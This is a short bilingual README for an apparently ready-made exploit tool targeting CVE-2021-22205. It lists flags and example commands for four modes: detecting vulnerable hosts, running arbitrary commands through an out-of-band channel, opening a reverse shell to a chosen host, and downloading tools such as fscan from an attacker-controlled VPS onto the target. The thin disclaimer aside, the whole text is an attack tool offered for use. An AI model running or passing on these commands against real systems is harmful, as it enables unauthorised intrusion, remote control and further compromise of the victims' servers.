CVE-2021-22205 RCE 工具仅用于分享交流,切勿用于非授权测试,否则与作者无关
-R string
VPS to load tools eg: -R 127.0.0.1:8083
-T string
Tool name eg: -T fscan
-c string
exec cmd eg: -c "id" (default "id")
-host string
reverse shell host
-m string
Method for using of CVE-2021-22205 eg:-m detect|rce1|rev|upload (default "detect")
-port string
reverse shell port
-target string
Target Url (eg: -target https://10.10.10.10) (default "https://10.10.10.10")
实现四个功能
DnsLog探测
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect
RCE
-m rce1
rce(Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami
反弹shell
-m rev
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081
上传文件(http出网-curl,需要VPS)
-m upload
CVE-2021-22205.exe -target https://10.10.10.10 -m upload -R 127.0.0.1:8083 -T fscan.exe